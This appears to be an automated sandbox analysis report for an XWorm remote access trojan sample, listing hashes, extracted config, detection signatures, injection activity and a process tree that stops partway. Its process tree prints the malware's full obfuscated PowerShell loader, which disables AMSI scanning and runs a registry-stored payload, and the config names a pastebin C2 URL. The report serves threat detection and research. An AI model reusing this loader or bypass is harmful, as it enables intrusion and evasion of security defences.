xworm | 0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864

Analysis

max time kernel
60s
max time network
60s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
15/06/2024, 05:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Iinpdftw.exe
Size

4.7MB
MD5

a9cb0e951c7ede7c23b5ba350b4920fd
SHA1

a16b2377a77e86b2a2cd27d58c44218e8aaa1a66
SHA256

0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864
SHA512

300111595b2ea4fc3143b25faca8f97e27286221456c792f5ea80b3fe066baf5d1d2fcca122ebe17362ea3f26fdb06388356be122389229745972bb6d0b6fad4
SSDEEP

24576:VwtcEr/TQ/8YlE33S3++12pt/R31ggXSe1dFwUMWo8zrC9b84opK76iV7+rt9V23:rz

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

Mc35OpRlVfHYgK3s

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/EiiXCJbn

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5072-5614-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2916 created 636	2916	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
652	powershell.exe
4500	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2752	$77e1f23e
5072	$77f99bf3

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77Docker Desktop Installer.exe	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4792 set thread context of 2752	4792	Iinpdftw.exe	80
PID 2916 set thread context of 4020	2916	powershell.EXE	83
PID 4792 set thread context of 5072	4792	Iinpdftw.exe	84

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2916	powershell.EXE
2916	powershell.EXE
2916	powershell.EXE
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4792	Iinpdftw.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4792	Iinpdftw.exe
Token: SeDebugPrivilege	2916	powershell.EXE
Token: SeDebugPrivilege	2916	powershell.EXE
Token: SeDebugPrivilege	4020	dllhost.exe
Token: SeDebugPrivilege	4792	Iinpdftw.exe
Token: SeDebugPrivilege	5072	$77f99bf3
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 4792 wrote to memory of 2752	4792	Iinpdftw.exe	80
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 2916 wrote to memory of 4020	2916	powershell.EXE	83
PID 4020 wrote to memory of 636	4020	dllhost.exe	5
PID 4020 wrote to memory of 692	4020	dllhost.exe	7
PID 4020 wrote to memory of 1000	4020	dllhost.exe	12
PID 4020 wrote to memory of 484	4020	dllhost.exe	13
PID 4020 wrote to memory of 540	4020	dllhost.exe	14
PID 4020 wrote to memory of 756	4020	dllhost.exe	15
PID 4020 wrote to memory of 1052	4020	dllhost.exe	16
PID 4020 wrote to memory of 1060	4020	dllhost.exe	17
PID 4020 wrote to memory of 1176	4020	dllhost.exe	19
PID 4020 wrote to memory of 1196	4020	dllhost.exe	20
PID 4020 wrote to memory of 1264	4020	dllhost.exe	21
PID 4020 wrote to memory of 1272	4020	dllhost.exe	22
PID 4020 wrote to memory of 1376	4020	dllhost.exe	23
PID 4020 wrote to memory of 1384	4020	dllhost.exe	24
PID 4020 wrote to memory of 1436	4020	dllhost.exe	25
PID 4020 wrote to memory of 1548	4020	dllhost.exe	26
PID 4020 wrote to memory of 1564	4020	dllhost.exe	27
PID 4020 wrote to memory of 1672	4020	dllhost.exe	28
PID 4020 wrote to memory of 1684	4020	dllhost.exe	29
PID 4020 wrote to memory of 1744	4020	dllhost.exe	30
PID 4020 wrote to memory of 1820	4020	dllhost.exe	31
PID 4020 wrote to memory of 1876	4020	dllhost.exe	32
PID 4020 wrote to memory of 1964	4020	dllhost.exe	33
PID 4020 wrote to memory of 1972	4020	dllhost.exe	34
PID 4020 wrote to memory of 1728	4020	dllhost.exe	35
PID 4020 wrote to memory of 1788	4020	dllhost.exe	36
PID 4020 wrote to memory of 2088	4020	dllhost.exe	37
PID 4020 wrote to memory of 2232	4020	dllhost.exe	39
PID 4020 wrote to memory of 2408	4020	dllhost.exe	40
PID 4020 wrote to memory of 2420	4020	dllhost.exe	41
PID 4020 wrote to memory of 2432	4020	dllhost.exe	42
PID 4020 wrote to memory of 2464	4020	dllhost.exe	43
PID 4020 wrote to memory of 2544	4020	dllhost.exe	44
PID 4020 wrote to memory of 2564	4020	dllhost.exe	45
PID 4020 wrote to memory of 2580	4020	dllhost.exe	46
PID 4020 wrote to memory of 2600	4020	dllhost.exe	47
PID 4020 wrote to memory of 2608	4020	dllhost.exe	48
PID 4020 wrote to memory of 2780	4020	dllhost.exe	50
PID 4020 wrote to memory of 1044	4020	dllhost.exe	51
PID 4020 wrote to memory of 792	4020	dllhost.exe	52
PID 4020 wrote to memory of 3316	4020	dllhost.exe	53
PID 4020 wrote to memory of 3444	4020	dllhost.exe	54
PID 4020 wrote to memory of 3476	4020	dllhost.exe	55
PID 4020 wrote to memory of 3824	4020	dllhost.exe	58
PID 4020 wrote to memory of 3952	4020	dllhost.exe	59
PID 4020 wrote to memory of 3976	4020	dllhost.exe	60
PID 4020 wrote to memory of 4024	4020	dllhost.exe	61

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:484
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5eec782a-f8f0-4ad9-b2e7-233dfe61a98c}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4020

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GbJMDRrjyuFc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XBkbtFofyxzNOr,[Parameter(Position=1)][Type]$tWftyZHqGw)$ruVkoAIOMeM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+'e'+'c'+'t'+[Char](101)+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'l'+'i'+''+'c'+',S'+[Char](101)+''+'a'+'le'+[Char](100)+''+[Char](44)+''+'A'+''+'n'+'siC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$ruVkoAIOMeM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eB'+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$ruVkoAIOMeM.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$tWftyZHqGw,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ruVkoAIOMeM.CreateType();}$lMAvErwPyCAKQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+[Char](116)+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KIlnvZNKHUUufP=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+[Char](65)+'d'+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FxYIxNXGCNtlacKygpy=GbJMDRrjyuFc @([String])([IntPtr]);$jSNzfMHIUzuovPzemMisQa=GbJMDRrjyuFc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$awrKPPHUiPm=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$YdkcXPVLIuhnjM=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object](''+'L'+'oa'+'d'+''+'L'+'ib'+[Char](114)+''+[Char](97)+''+'r'+'y'+'A'+'')));$LEbKeLlEQzHrwDnOZ=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+'l'+''+'P'+''+'r'+'ote'+[Char](99)+''+[Char](116)+'')));$NkbOJSD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdkcXPVLIuhnjM,$FxYIxNXGCNtlacKygpy).Invoke('ams'+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$UYtmAyLBBKaSOGIGo=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$NkbOJSD,[Object](''+[Char](65)+''+'m'+'si'+'S'+''+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$aRNyktcPCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,4,[ref]$aRNyktcPCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UYtmAyLBBKaSOGIGo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,0x20,[ref]$aRNyktcPCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1376
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1788

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2464

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
